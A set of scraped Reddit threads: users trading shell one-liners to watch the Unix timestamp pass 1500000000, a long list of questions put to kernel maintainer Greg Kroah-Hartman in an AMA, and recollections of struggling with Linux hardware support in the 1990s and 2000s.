Nope, your printf is a bashism. Challenge accepted:

    #!/bin/sh
    
    AWKPROG='BEGIN { srand(); print srand(); }'
    
    while ct=$(awk "$AWKPROG"); [ "$ct" -le "1500000000" ]
    do
        tput clear
        printf "%s" "$ct"
        sleep 1
    done
    tput clear
    printf "%s\n" "1500000000!!!"

`date +%s` is a non-standard as well. POSIX master race.
How is that solar eclipse in the news and this isn't?! Solar eclipses happen a few times in a lifetime, this only happens once in the history of the universe! /s
[deleted]
Son of a bitch

http://i.imgur.com/a3SXFLh.jpg
Well, viewed from the UNIX side, it is undistinguished  number. It's only interesting because you are used to base 10. 

   sorry
Watch it live: http://www.coolepochcountdown.com/
That's my birthday! And my birth time, to about 5 minutes off!
Shorter:  
  
    watch -n 1 date +%s
HAPPY SESQUIGIGASECOND!!!!!
So how fucking cool was that!! Everyone I know now thinks I am crazy.

http://i.imgur.com/UbxwIMx.png
Happy DecaMegaSesquintennial!!

http://i.imgur.com/cVceUtG.jpg 
Arizona?
Damn.

> $ printf '%(%s)T\n' -1

> printf: %(: invalid directive
Dammit! I missed 8008135
I remember when it flipped to 1000000000. then 1100000000 in 2004/2005.
meh, I'm more looking forward to Jan 13 19:13:30 UTC 2018.

Decimal is for casuals.

And another milestone we all missed was Sep 22, 2016 4 P.M. UTC. Something like that won't happen again until 2028.
Damn, it's like an IRC party or new year's eve in here!

1499923454 looks so much smaller in a terminal...
Now I know what Ill use the leftover beer from fathers day for. 
Why are we even using this for dates?

Just do it like an actual date and have separate variables for second minute hour day month year instead of cramming it into a single seconds field. Then you can't ever have overflowing or nonsense and you don't need to constantly expand the length of the seconds field.
A really bizarre coincidence that I just watched Numberphile's video on Unix time not even five minutes ago. Had literally no clue this was going to happen soon.
or just 

date +%s
Your code doesn't work at my PC, so:

    while [ 1 ] ; do printf '%sT\r' $(date +%s) ; sleep 1 ; done
GODDAMMIT. I was going to post about this at the exact time. Happy 1500000000 epoch. You ruined it.
I'm holding my breath for the lucky image get on 4chan
In 31.39 hours ?
GET HYPE
When will 16 hit? 
    watch -n 1 -p 'bash -c "date ; date +%s ; echo 1500000000 - $(date +%s) | bc "'

> `printf '%(%s)T\n' -1`

Works in bash, ksh and sh (which is a symlink to bash on my system), doesn't work in zsh or dash. Invoking the coreutils command `/usr/bin/printf` rather than shell builtin also fails.

So running a particular shell explicitly, eg.
`sh -c "printf '%(%s)T\n' -1"`, should be more robust.

`date +%s`is another alternative; should work with anything that has a sensible installation of coreutils.
In norway it will be Fri Jul 14 04:40:00 CEST 2017
    date +%s   

is what you need to see the num of seconds since epoch 

And you don't need a while loop. Just do a : watch -n 1 -d date +%s
    ~ $ printf '%(%s)T\n' -1
    %(: invalid conversion specification

Uh, I guess it only works for bash?
I made a thing so you can watch it in your browser.

<https://codepen.io/tortxof/full/BZMKdV/>
To watch live from anywhere, go to https://www.time.is/Unix_time_now
He chose a book for reading
Couldn't get countdown to work so this is what I used:

```
while true; do echo -ne "`date +"%s"`\r"; done
```
I have noticed it last week and made this
https://www.reddit.com/r/ProgrammerHumor/comments/6lwj0o/are_you_gonna_celebrate/
We're entering here new and unknown territories. Where no unix has ever gone before..to 2000000000 and beyond!

Interessting time, indeed we are living in interessting times.
Yay?
I like base32 as time format:
perl -e 'print pack N, time' | base32 ( thanks /r/commandline )

Someting like

 LFTUDUY= 

is so much more efficient than 

Thu Jul 13 10:50:59 WEST 2017


At this moment 1499944836 my laptop, on a server I manage 1499944961
I remember when I was the only one in my circle of friends excited about 1400000000. It was pretty awkward..
Eew! 

Not to be too critical here, but that bash one liner is on the complex side for one liner.

    while sleep 1 ; do date -u +%s ; done

It replaces the 'while true' nonsense with an always true 'sleep 1', which was happening anyways. It then prints in UTC which is better than GMT because utc is not a time zone, it's universal time, gmt is Great Britain which switches to BST British Summer Time for day light savings... this is why time zones should not be used.

Another way to achieve the same thing even shorter

    watch -n1 date -u +%s

If your fine with the default interval of 2 seconds, remove the '-n1' to make it even shorter

Going back to the original while loop of 'while [ 1]' it can be more easily expressed as 

    while : ; do  foo ; done

That colon is an alias for the 'true' cmd in unix/linux. It's the same as typing 'while true ; do ...'.
That's in the middle of the night here, but running this should leave a treat for me in the morning:

    while true; do T=$((1500000000-$(date +%s))); sleep 1; if [ "$T" -lt "-10" ]; then break; else date +%s; fi; done
For us zsh users:
  while { print -P '%D{%s}' } { sleep 1 }
I've been preparing for this for months... 
http://imgur.com/a/F9nol

Left 4 digits is time in 24 hour form. Right 10 digits is current unix timestamp. Runs of arduino. Gap in the middle is due to the two displays only having 8 digits.
[Took a screencap of the precious moment](https://noah.doesnt-have-a.life/ohp8esv.png)
Somebody mind to explain this printf command? What does %(%s)T do? Why the -1 at the end?
Yaj! For arbitrary numbers 😁
Ermahgerd!
RemindMe! 16 hours
As a somewhat newbie to Linux, what does this mean? What's going on and why is this special?
$ watch date +%s
This doesn't work on zsh for some reason. It works on bash though.
YE

I made a video and have set it to public, so you can view it. https://www.facebook.com/boombrush.scotthowie/videos/1449726291716182/

I tested this without being logged in and you can view it.
Thanks everybody! This was fun!!!!
    while :; do echo -en $(date +%s); echo -en "\b\b\b\b\b\b\b\b\b\b"; sleep 1; done

[Betterish output (Not so posix output)](http://i.imgur.com/DpQ9YJl.png)
Man, I like Linux too, but have better things to do with my time than watch the timestamp flip over.
Or...!!! I could watch paint dry...
Did people really get excited/interested in pointless info like this? Must be a boring day...
To get a few easy questions out of the way, here's a short biography
about me any my history:
        https://en.wikipedia.org/wiki/Greg_Kroah-Hartman

Here's a good place to start with that should cover a lot of the basics
about what I do and what my hardware / software configuration is.
        http://greg.kh.usesthis.com/

Also, an old reddit post:
https://www.reddit.com/r/linux/comments/18j923/a_year_in_the_life_of_a_kernel_mantainer_by_greg/
explains a bit about what I do, although those numbers are a bit low
from what I have been doing this past year, it gives you a good idea of
the basics.

And read this one about longterm kernels for how I pick them, as I know
that will come up and has been answered before:
https://www.reddit.com/r/linux/comments/2i85ud/confusion_about_longterm_kernel_endoflive/

For some basic information about Linux kernel development, how we do what we do, and how to get involved, see the presentation I give all
around the world:
        https://github.com/gregkh/kernel-development

As for hardware, here's the obligatory /r/unixporn screenshot of my
laptop:
        http://i.imgur.com/0Qj5Rru.png

I'm also a true believer of /r/MechanicalKeyboards/ and have two Cherry Blue Filco 10-key-less keyboards that I use whenever not traveling.

Proof: http://www.reddit.com/r/linux/comments/2ny1lz/im_greg_kroahhartman_linux_kernel_developer_ama/ and https://twitter.com/gregkh/status/539439588628893696
What's your thought on the BSD Kernel? Is there anything they do that you wish the Linux kernel did?

I have tried BSD but due to a lack of hardware support I have never used it long enough to see if it has any benefits over the Linux kernel. 
Hi Greg,

Thank you for taking the time to give us this AMA.

I maintain a port of a WiFi USB dongle driver, provided by the chipset manufacturer and awkwardly hacked at by yours truly to make it compile against recent kernels... because the native kernel driver doesn't work, and hasn't for many releases now (bug #57171, as far as I can tell).

As a humble user who hasn't touched a line of kernel sources for a good decade and a half, what can I do to help you guys close that bug?
LLVM/clang is getting closer to being able to compile the entire Linux kernel. Do you have any strong preference for specific compilers, e.g. GCC versus clang?  Since compile speeds seem to be a concern of yours (as mentioned in your blog), I'd imagined you might have an opinion. 

Also, what do you think of the continued development of the ISO C standard, now that GCC had added C11 support? Is it of any interest to kernel developers? 
What is your opinion on the Android platform and its openness? And about companies like Amazon that branch off AOSP. I've been reading about approaches like CyanogenMod, which I take are based on downloading AOSP as soon as it's released, then re-implementing parts of it where there is a need/clamor for the phone to behave differently.
My Notebook has a Trackpoint and Touchpad, but the driver does not allow to use both at the same time (with multitouch). [A patch exists](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/967399) for over a year, but it still is not included in mainline.

What can i – a user, not a coder or developer – do so that the patch gets included into mainline?
I remember almost 10 years ago i had problem with a dvb-t tuner card wich was not yet completely supported by linux. so i mailed to some mailing list for help and you replied with a working solution. I never thanked you for it. This card is still working (playing AC-DC now) so THANK YOU!
Hi, Greg. 

All Linux development is done via a number of mailing lists. This both works and doesn't -- everyone admits that the amount of traffic on LKML is simply unmanageable, but LKML is still a required step to getting your patches into mainline. Do you see this changing at all in the future? Do you foresee any move towards using other tools (whatever they may be)?
In your opinion is it worthwhile doing operating systems research? Is it possible for a newly designed operating system to gain traction when linux has already had so many man hours of work put into it?
[deleted]
Hi, Greg.

What is it about Arch Linux that impresses you?
How much of your time do you spent programming and how much is spent communicating?
What would make you even more happy with Linux?
In the last years quite a couple of new programming languages have emerged. What do you think about them – can any of them replace C in future or do you think we will be stuck to C forever?
If you could go back a few years and make one big architectural change to the kernel, what would it be?
How did you get into programming? How did you discover Linux? Do you use it as your daily driver?
What would you say has been the most rewarding part of working on the kernel? How has it, if at all, changed you as a person?
Do you ever sleep?
Are you even human?
How do you so many things?
You even answer questions on IRC, how?
Hi GKH, thanks for your good work.


In your opinion (and in the opinion of other kernel developers) is the complexity of the kernel and its rate-of-change a problem or will it become a problem in the future ? If so, is there a plan to address it and what is the plan ?

Just stopping by to say thanks for your 'getting involved' article. After reading it It took me a week to write my first simple patch and another year to score a job at Red Hat. Thank you.
I have contributed smaller patches to the kernel and really like it, but I do not know where to find something to really work on. Any suggestions, aside from watching the subsystem lists?
Are you aware that if you do a google search for your name, google presents a photo of you flipping the bird?

proof: http://i.imgur.com/7yIw2oC.png
Mine it's not a question but just a big **thank you**. Thank you for your passion and your skills, a lot of us are here because people like you exist. 
When do you think there will be a switch to Linux kernel version 4.x :) ?
were you angry over poor quality patches before? you know....like how Linus gets angry and start cursing over poor codes

edit:word
What books would recommend for a new programmer or that you have found to be indispensable?
What advice do you have for someone studying computer science? What topics or subjects do you deem as essential?
What are your opinions on OpenSUSE factory?
Considering you worked for one for a long time, how do you feel about major Linux/OSS commercial companies and the distributions they support like RHEL and SLES?

What role do you think other software like KVM, Steam and Openstack have had in the adoption of Linux distributions if any? What role do companies that support these techs have on the foundations of their work which is often the Linux kernel and associated software? Are they involved like you'd like?
What is your opinion about the growing trend in the network world of bypassing the kernel like DPDK does? Is it one step too far from the IMHO healthy step of moving logic out of the kernel like open vSwitch and the 'team' link aggregation do?
Wow,  I didn't expect to see arch and i3 as your desktop. We're practically the same person (besides the talent, experience and dashing good-looks...).

On a serious note though, I am just trying to get into kernel development and have seen several of your videos on the topic. In them you often encourage us newbs to make patches to correct superficial things like whitespace, comments, etc., but it seems that lots of other maintainer around the web discourage and ridicule these patches. Do you stand by doing this or should it just be done long enough to learn the process in order to be prepared for real patches?

Thanks so much for taking the time to do this AMA and for all the work you do; Linux is much better for it.
Why do Linux kernel developers continue adding new system calls to the kernel rather than creating a new device file.
I love the Unix way of 'Everything is a file'.
What is your opinion?
I know this is in /r/linux but I think I can find out most of what I'd want to ask you about linux from reading/watching posts/talks of yours.  So with that said:

What activities do you do outside of linux?  What's your second favorite hobby/thing to do in life besides linux?
What is the one misconception about Linux you've personally heard the most which also seemingly refuses to go away?
[deleted]
how much experience with c do you feel is necessary before attempting to contribute?
Question: What is the worst piece of code you ever had to, or ended up writing? Why was it so bad?
What are your opinions regarding the inclusion of OverlayFS into the trunk kernel?
I have the same setup as you! (Arch + i3)

Anyway I'd like to ask which of the major companies that contribute to the kernel are the easiest to work with and which contribute in your opinion the most useful code. I've seen Microsoft being often cited as a big contributor but heard that 95% of the stuff is only for their HyperV technology.
What is your preferred way of updating kernels? Is Ksplice worth trying?
Why must Linux device drivers all live in the kernel? Is there a consensus that moving them into user space would be infeasible, slow, unnecessary, or some such?
How do you feel about linux on the desktop? Do you think with valve supporting linux, it will become a true rival for windows on desktop computers? What do you think is holding linux's success back on desktop computers?

edit: Also I see you're running arch, awesome!
Any chance you'll be making the time to launch new editions of Linux Kernel in a Nutshell && Linux Device Drivers?... Or new titles?
Do you still use Terminology?
http://enlightenment.org/p.php?p=about/terminology&l=en
CoreOS is a very exciting project for many operations folks. What has your experience been like working on the technical advisory board for CoreOS?
[deleted]
What is your opinion on X11, do you agree it's holding desktop Linux back significantly?

Do you think Wayland will improve the situation?
Do you still have the Steam Machine Prototype you got from Valve? How's the controller? How does it show up in lsusb?
Care sharing your Vim config?
[deleted]
Do you think the rolling release methodology of Arch should be adopted by larger distros? 
The more I look at Plan 9, the more I think that I would love to have a system with those features, but with the extensive hardware support that the Linux kernel enjoys. Do you think Linux will ever get the necessary infrastructure to fully support Plan 9 natively?
I'm a CS student returning to C after having learned about functional programming and design patterns like loose coupling, DRY, unit testing and so on and I find it very difficult to write beautifully designed, loose coupled C.

* Do expert C programmers write decoupled and DRY C and if so, do you have any tips for achieving this?
* Do you know anything about the Rust language and if so, do you think it could become a better language than C for writing a next generation Linux kernel, given the scenario that the gains from rewriting the kernel would far outweigh the effort?
* What is your favorite field in programming?
* What do you think of C11? Are there any features in C11 that you have been waiting for?

Thank you for your contributing to the Linux kernel and doing this AMA. I would never have studied CS if it wasn't for Linux.

Have you ever been tempted to write new (non-linux) kernel from zero?
You run arch on a macbook. People recommend dual booting OS X to get firmware updates. Do you do this?
Do you think Linux would have turned out nearly as well as it has if it was licensed under the BSD license?
How would you suggest a developer with only a little bit of experience in C, and no experience with kernel programming could head towards kernel development?
could you please explain-like-im-five KDBUS ?
what it is for ? what's the improvements ? 
It seems to me that the kernel is getting harder to compile yourself. Is that a reasonable observation? 10-15 years ago, you could compile the kernel and by and large it would mostly just work with the defaults on non-obscure hardware. These days, that doesn't seem to be the case.

For the last kernel I compiled (3.17), when I went with the defaults, my graphics card wasn't fully supported at sensible resolutions, I had no sound at all, I couldn't even boot the system because I lacked the right crypto module to get at my LUKS block devices and I still can't work out which firewalling modules I need to add in order for docker to start up.
I remember that you did a presentation somewhere about getting into kernel development.

If I recall correctly, you said that a good way to get into modifying the kernel, is to fix typos and code style mistakes, and send those in. Do you still hold the same opinion(/am I remembering wrong)?
o/. You know me; we've bounced around on mailing lists and Google+. Just want to say you do a ton of awesome work, even if I disagree with you on some stuff. :)
Do you have a feeling that kernel will be so much complicated that human brain will not be able to comprehend it anymore?
What do you think are the most important 5 topics that an Operating System Internals course should cover?
Given that you are a tty maintainer and handy with USB, I've got a related question to ask. I'm working on a project in which a number of USB gizmos (between 10-20 devices) are connected to a single host. Each device is in fact a MCU hidden behind a FTDI323, hence all present themselves as USB-serial converters. Aside from USB bandwidth, should I expect any issues coming from tty or usb subsystems if I happen to chat with all the devices simultaneously? 

BTW. in my tests on a BeagleBone Black as a testbed, with random 10 devices (keyboards, random USB drives I could get my hands on), only blockdev was causing some grief, but nothing out of the ordinary.
Question:  Have you ever used APL? Do you like those families of Programming Languages?

Question: Where do you fall on the Micro Kernel vs Monolithic Kernel Debate?
It seems humanly impossible to know what patches from the various subsystems must be backported. Do you think it's possible for someone with basic kernel development knowledge to support a different kernel version as LTS version? IOW, what skills are necessary for someone to maintain the LTS kernel?  A related question is, do you closely look at the patches marked for backport to fully understand what the patch does before adding it to your tree or do you rely on the subsystem maintainers to know what needs to be backported? 
In regards to the various approaches to no-reboot kernel patching for Linux (KSplice, KernelCare, etc), do you have any strong opinions on the methods being employed?  Obviously there has been a bit of a reaction to Oracle acquiring KSplice and only offering it for their distribution, but I am mostly wondering if the kernel project itself has any opinions on what "the one true way" for hot patching the kernel might be.
What did you have for breakfast this morning?
Hey Greg, always like your talks and videos about the kernel.

Have you spend any time looking at the source code of other kernels?  *BSD, Solaris derivatives, etc?  If so, are there any particular features or designs in any of these kernels that you admire or think are particularly clever as compared to the Linux implementations of the same features?

Any notable userspace applications that you like to tinker with and think are interesting architecturally?

Thanks in advance.
Since you have worked for a long duration with the Linux kernel, how do you see the future of the kernel from say 5-10 years from now?

What major features etc "may be" added to it? What features that are currently very common "may become" obsolete?

And what's your favorite distro (please tell about the top 3 things you find very attractive with the distro)?
On April 10, someone linked [a Pastebin of the handshake function for OpenSSL to the /r/programming subreddit](https://www.reddit.com/r/programming/comments/22o7kp/want_to_audit_openssl_you_sure_check_out_this_one/). On May 1, there was a handshake flaw reported. On June 5, the [news of OpenSSL's handshake being insecure](https://www.openssl.org/news/secadv_20140605.txt) came out.

I have to admit that it was hard to wrap my head around given no context or background. Do you find the kernel code similar? 

I once tried to compile a modified kernel for an operating systems class a number of years back, but kept on getting panics when I tried to run it.
Question: What is your favourite Mono Font? 
I'm not sure if you're still answering questions but what are your thoughts on ChromeOS/Chromebooks and what Google have created?
Greg, how do you think, have you succeeded? 

What gives you the best pleasure at work? 

What would be your opinion about Linus if you knew he doesn't read this AMA? 

What are you thinking about if you can't sleep? 
Have you ever programmed a Windows driver?
Question: I have so much Ram these days that people tell me that I should not bother creating a swap any more. There is surprisingly a lot of debate around this; What say you oh wise one?
Heh, typical programmer... Starts his ama with "read all this documentation" :)
[deleted]
Did you get any surprising backlash for simply supporting the systemd project?
What's your opinion related to sailfish OS?
[deleted]
What do you/the kernel maintainers think about systemd? I know that Linus Torvalds has no strong opinion (surprisingly for me) on systemd, but what about you/the others?
If there is a problem with the kernel, like it is being reported now, of lockups ect, does a new kernel release go ahead even then, or do u guys first sort it out and then the new kernel gets release?
What would you recommend for reading for someone who is interested in kernel development? Any particular blogs or intro to kernel books you'd recommend? 
I love i3, do you have your .config posted anywhere? :)
Tinification of the Linux kernel. What parts of the kernel need sharing or shaving? Last I built an allnoconfig kernel it was about 500K in size.

Do you still follow and/or participate in development of any userspace software other than those started by you?

When reading hardware specifications... how do you persist?

And just wanted to say that `bti` was one of the first C programs I tried to really understand by reading the code, because it was real-world code, small, simple and easy to look at, thanks.
Dumb question - how long does it take to compile or whatever it is you do when preparing a new version? Do you often have hilariously frustrating errors?
Thanks for all the great work on the kernel and thanks for doing this AMA. I hope I'm not too late.

Here's my question: Have you ever heard of [NixOS](http://nixos.org/), and if so, what do you think of it?

In short: It's a Linux distribution, and a (stand-alone) package manager (Nix). Package descriptions are written in a functional language, installations/updates/etc are like transactions and can be rolled back, and multiple versions of the same package can be installed alongside without conflict, sharing common versions in their dependency tree. There's also [GNU Guix](http://www.gnu.org/software/guix/) which is based on Nix.
Question: Is there anything that you know Microsoft or Apple does better from a kernel standpoint than Linux?
Question: What were your initial thoughts on OS/2? What do you think of ReactOS?
Question: In your opinion; does Canonical contribute enough to the Linux Kernel? If they do not contribute a lot; do you think it is reasonable if they respond that they make up for it by contributing much more to User Space?
Question: I have heard that working with Intel is really a pleasure. Do you have the same sort of relationship with AMD?
A couple years ago you were scheduled to speak at Linux Fest Northwest in Bellingham.  Sadly you had to pull out that year.  But you haven't rescheduled in subsequent years.  Are you going to sign up to speak at one, say perhaps LFNW 2015?
A few related questions, please ignore any that make you yawn:

- How do you think the ageing (and eventual retirement/meltdown) of the older, super-talented, kernel hackers will affect the kernel?
- Do you feel there's enough younger, similar talent coming through?
- Have education systems changed in a noticeably beneficial or detrimental way to the kernel ecosystem since you were a student?
- Is the kernel too difficult to learn now that we have bonkers-level ideas like RCU in it?
Greg, thanks for doing this AMA!
Being late to the party, but nevertheless:

Which features do you miss in Git? What would you do different when designing Git to appease you and your workflow as a kernel dev?
What's the most challenging part of being a kernel developer? How does a programmer become a kernel hacker?
Hi Greg,

Due to my job, I am more interested in the ARM side of the kernel and I wanted to know how you and the core developers feel about the device trees and their integration into the kernel tree.

Thanks for your contributions!
So coffee ?
Which one do you prefer ? and how many cup per day ?
I see you replaced SCO Unix with Linux in the 90s. What was your first setup? Did you use a distro (Slack?) or put it together yourself?

My first interaction with Linux was Red Hat (before the RHEL/Fedora split) in 2001~2002 IIRC. Was it much more difficult to get a working setup back in the day, and would you compare the process to anything else (the Linux From Scratch setup, maybe?)

Thanks for this very interesting AMA and your hard work on the kernel. You make the world a better place!
How do you feel about not being able to change the kernel in an android phone/tablet as easily on the desktop? do you think we will be able to run a vanilla kernel on our phones/tablets someday? Do you know of what us being done to achieve that?
Hi Greg, big fan here as I have learnt a lot form your videos, tutorial and very humble responses through the mailing lists. 

I have contributed a few basic patches to the kernel, but would want mentor for better direction. What would you recommended.

What are some of the favourite websites you read visit regularly?

Hi Greg. Several years ago I attended the Linux Hardware Engineers Conference that you spoke at in Seattle. I was wondering if you have any plans to attend or present at any of the Linux conferences in the Pacific Northwest and if so which ones? Perhaps Linuxfest Northwest in Bellingham?
Greg,

Out of the SoC and hardware vendors, who do you think is doing the best job maintaining drivers, communicating with the kernel developers, following community rules and contributing? For example, how do you think Nvidia is doing after the infamous Linus finger? How about others like Intel, TI, Qualcomm etc.?

On the other side, who do you think can do a MUCH better job?

Thanks!
Question: Does your linux install have any custom mount points? Say for example, /var under reiserfs, /etc under btrfs, /home under ext4?

Hey Greg, nothing specific. Just saying hi. We were happy to have you at the HSBXL hackerspace last year. I was the guy playing hotline Miami all day :) 

How you doing?
Question: Is there any point in your mind why Nvidia or ATI(AMD) should keep their drivers Proprietary? Is the code that they have in there so valued by competitors that they would be shooting themselves in the foot if they released it open source, depriving them of profits?


Question: Do you play any Musical instruments?
Question: Do you think Wayland is an exciting project  for the future of linux ?
As someone who is very familiar with the way kernel maintainers handle things, can you give us some insight on the problems regarding Con Kolivas' kernel patchset, and why the patches were never merged? In your personal opinion, do you think there's useful stuff in those patches, or in the BFS scheduler? Or do you think most of the alleged benefits come down to placebo? Is the problem just that it's hard to quantify or measure desktop responsiveness from a user perspective with benchmarking tools?

Basically, I'm trying to figure out whether there are actual weaknesses in the kernel that those patches (and the BFS scheduler) addressed, and if so, what would be the first step towards getting either those patches, or something similar, merged in the future? Do we have to start by writing better benchmarking tools that can measure responsiveness or what? Or is X to blame for everything?
Wow, you're still answering? Cool.

How does it feel to have written code that lives in millions of computers and mobile devices around the world? Do you feel like a little piece of you exists even in the Linux-powered computer I'm using to type this response?
Which comment is the funniest that you have seen in Linux Kernel sources?
What do you consider the hardest part of your job?
What parts of the kernel do you think that needs more attention that it gets from current developers?
Do you know of any area that will benefit from a large rewrite/rework?
In other words, if you had a full-paid kernel-hacker team under your command, what would you ask them to work on?

Thanks for the AMA!
Will 2015 be the year of Linux on the desktop?
Question: Are you ever recognized in the street by total strangers as being a head kernel developer?
Question: Has anyone from the NSA, CIA, FBI, or [insert any federal agency here] approached you formally or informally, inquiring whether you would be interested in putting a back door in the kernel?

When Linus nodded his head in affirmation to the same question; do you know if he was being facetious or serious?
Question: What is your proudest piece of code you have ever written?
What are today's biggest challenges for the Linux platform and Open Source? What companies are the best/worst behaved in the OSS arena? For example, in cloud computing?
do you like cinema director lars von trier? what kind of movies do you like?
You originally you didn't like IBM Power machine that was sent to you. Did you have a chance to look at the newer model with POWER8 processors and running KVM?
I'm not a programmer, although I have a rudimentary understanding of java and a few scripting languages. I'm going to be completing my degree in IT soon and I personally have a big interest in administrating Linux systems.

Is there anything that a person with that skill set can do to contribute to Linux development? I really can't stress enough that I know programming like a first year Spanish student knows Spanish.
What do you think about https://github.com/urbit/urbit?
Do you think that the phrase "use the code" has started to be less relevant these days? Should each project from the kernel have a separate documentation to back up the code, to give a better big picture for developers, not just for usage?
There are some projects that lack at comments (there are almost no comments in some of them).
Also, for newbies is pretty hard to get a hang of the big picture for projects in the kernel.
I am a student interested in contributing to Linux.  
I have read your device drivers book and found it nice, thanks.  
How can I find something interesting to hack on?  
(fixing coding conventions on staging drivers do not appeal to me very much because I can not 'see' the effect of my changes)
Do you want the moustache on or off?
What are some things you'd like to change about C? It looks like it is "good enough" for the Linux kernel, butI could imagine that there are some things which would make it even better.
So, how is kdbus coming, and what are your thoughts on 'is this the correct design or not' for it? I'm quite interested in the 'sealing' abilities of memfd.
It's a silly noob question, but I'm curious: what's the advantage of kdbusfs over the old character devices way?
I wonder how can you handle all the amount of work without getting crazy :)

How is your normal day? At what time you get up? How many hours you work per day? Do you do anything to sync with developers in other timezones? 

When are you going to release all the slaves in your basement that work 24/7 for you?

Thanks for a great work
Question: What is your philosophy in writing tests in your code? Is it utilized extensively in the Linux Kernel?
Hi Greg, thanks for all the things you do for Linux. I'm curious how your workflow looks. Which editor and other software is invaluable for you doing your job properly?

Thanks!
What's your take on Nix, Guix, and the idea of purely-functional package management in general?
Really love to read your comments and insights.

Wanted to say thank you for doing such great work!

/Enough fangirling
Question: Do you, or would you ever do any programming or maintaining from your phone?
Question: What are your thoughts on Plan9? Anything you find interesting going on there?
G'day Greg - just wanted to say, good job with the USB stack.

Lurked on linux-usb-devel for years watching things go from, "I think we have a good way to enumerate USB devices now" to pretty much plug-and-play.


How much money do you earn as a kernel developer, if I may ask? 
[deleted]
How does one start getting into kernel dev? Do I have to read K&R and master the C language? I got a B+ in my C and Assembly course. Am I a goner?
What do you think about the new (2000s) wave of pure microkernel design operating systems?

What are your thoughts on [Minix3](https://en.wikipedia.org/wiki/MINIX_3)?
What are your thoughts on x11/xorgs current state? Do you feel like the wayland project will be the next standard or do you think ubuntu's mir will be the next standard. When do you think wayland will go mainstream(if you use it, or help dev it) ? Also what do you think of btrfs? 
Who inspired you to code?(If any), and do look up to other devs? Do  you enjoy your job? What are your thoughts on net neutrality?  
Any reason you think for intel or any other cpu to make the jump from 64bit to 128 bit? 

Say an x86_128?
What are your opinions about linux viruses? or Linux security in general? Do you think they are a threat? 
Just got a message from you, Greg. Nice to see nobody gets forgotten between kernel contributors.

So here goes another question. How long was your greatest "MUST DO IT NOW!" strike of coding?
Hello. I see that you are still answering questions here. :)

What should I do if neither the maintainer of a driver module, nor anybody from the mailing lists have responded to my patch? I understand that nobody is obliged to do that, but is this usual?
What's the strangest, yet still functional, hack you've ever come across? Bonus points if it turned out to be a great idea.
I just read [this short article](http://www.engadget.com/2014/05/24/my-first-time-with-linux/) and realized how easy we have it these days. The people who had half their hardware not working early on, but kept using Linux anyway, are the ones responsible for Linux getting so far on the Desktop. They deserve special thanks. In fact I'd love to hear stories of wrestling with hardware issues in earlier Linux releases if anyone has any to share.
Since 1994 here. Good times. I remember getting dial up finally working for the first time, was one of the greatest moments of my life. 

I remember weird little things, like how /dev/dsp was a generic sound interface and each program didn't need to be individually configured for your sound card. At the time this blew my young and fragile mind.
Thanks for the hat-tipping.

But remember: **always try to report all bugs you encounter!** (if someone hasn't done it already)

I did that since 2005 or so. There are some bugs which still persist until today, but I think 90%+ of all the bugs I reported were closed. There are some people who rant about Linux having bugs and how Linux is not ready for the desktop, but they don't realize they can do something about it.
[deleted]
I have been using Linux since around 1997 and not really *that* much has changed. Most of the big improvements are not due to changes in Linux, but due to changes in the underlying hardware itself. Meaning your hardware is now mostly USB or Plug&Play PCI cards, not some old ISA cards that forced you to fiddle with jumpers, IRQs and DMA channels. Your monitor is now a LCD that will report it's supported resolutions and refresh rates and not some CRT that might explode when you get the Modelines wrong. 

Some changes in Linux, such as not having to `mknod` your device files manually are certainly welcome and being able to hotplug a mouse and have it work without restarting X or `modprobe`ing some modules is certainly a welcome addition as well. But at around 1998 I already had working 3D acceleration, graphic tablet, soundcard, joystick, printer, TV capture card, modem and basically everything else. A SuSE would even allow you to configure most of that easily via YAST, a Debian was not quite as friendly (and still isn't). All you had to do is buy hardware that was supported and not some crappy WinModem junk. Oh, and back then we also already had the promise of commercial games and software coming to Linux real soon, thanks to Loki and Corel porting a lot of stuff over, didn't turn out so well in the end.

The one big thing I can think of that we didn't have for quite a while was a good video player, there was like xanim or however it was called and that didn't really work with most files, but even that changed in the early 2000s with aviplay and mplayer.

Basically since Ubuntu has entered the Linux world little has changed, it provided a Debian with sane defaults, and that was really needed, but since then it just has been a lot of shuffling things around and redesigning the user interface over and over again, but there is little I would call a substantial improvement. Still crossing my fingers that Nix or something like it will kill apt, it's really about time.
2001'er here. I hate to say this but some of Linux's biggest issues have always been closed source stuff.

* Getting Flash to work and convincing Adobe to bother.
* Dealing with Word/Excel documents when Crossover Office was the only viable solution
* Updating your system to find your kernel no longer matched the nvidia driver
* iPod support when iPods were 'the thing to have'
* Always needing a wired connection to the Internet because the distros didn't ship with easily usable wifi software (MadWifi)
* Having to fuck around to play a DVD due to license restrictions preventing it from working out-of-the-box.
* Not being able to play .wmv files and .wma when they sort of took off around the time of MP3.
* Websites that only worked in IE
i jumped ship in 2004. with an unsupported ati card. 

fglrx was so abysmal at the time that it would often crash the X server or lock up the computer. fortunately opensource driver soon caught on and i had my graphics working fine. getting other hardware to work was also quite a complex task sometimes. i do think it was worth it, at least now i have a job due to what i learned.
Yes, the days of having to supply CRT mode lines  by hand definitely are over! We had to calculate this crap back in the day when configuring a monitor for X11:

http://www.arachnoid.com/modelines/
[deleted]
[deleted]
Late 1996, early 1997 or so. Slackware

Linux was way more stable than Windows, more interesting and with better tools to work with. First installed kernel started with a 1.0.something (from a Sam's Slackware book -- maybe 1.0.18) but 2.0 came out shortly thereafter? Can't remember details exactly.

New hardware at the time could mean up to a years full wait for Linux drivers to appear, so patience was essential. Still, most hardware was working at some level at or shortly after install (see user name.)

Building your own kernel to match your system hardware was essential then, mostly due to slow CPUs and other hardware-related issues. Standards in the hardware world have greatly improved things for everyone.
All my hardware work right out of the box. except my Lexmark printer. Which at the time was called a paper weight under Linux. I switch to Linux(Simply Mepis) back in 2003. Having a printer not working wasn't discourage at all. I just bought a HP printer the next day. And it work right out of the box. I sold my Lexmark printer, which wasn't old at all, a few weeks later. Never had any hardware issue after that. Never went back to Windows. Linux, was just the dominated operating system around my house and work place. Thank you Linux community.
actually we owe modern Linux to the men who were men and wrote their own drivers
Wrestling with hardware... well, I may have a couple of stories:

 - I had a Matrox G450 back in the day. A dual-head graphics card when such things were rarities. You pretty much had to hand-edit your xfree86.conf (yes, long before xorg) because it didn't auto configure properly and none of the inbuilt distro tools on any distro did a very good job of dual monitors. If you wanted X Windows to use both screens like any modern system (moving windows between screens), you had to use xinerama - and xinerama was fundamentally incompatible with 3D acceleration. Took me ages to get it working, and when I finally managed it I kept that same config file through several changes of distro, simply because it was the only reliable way to get things working.
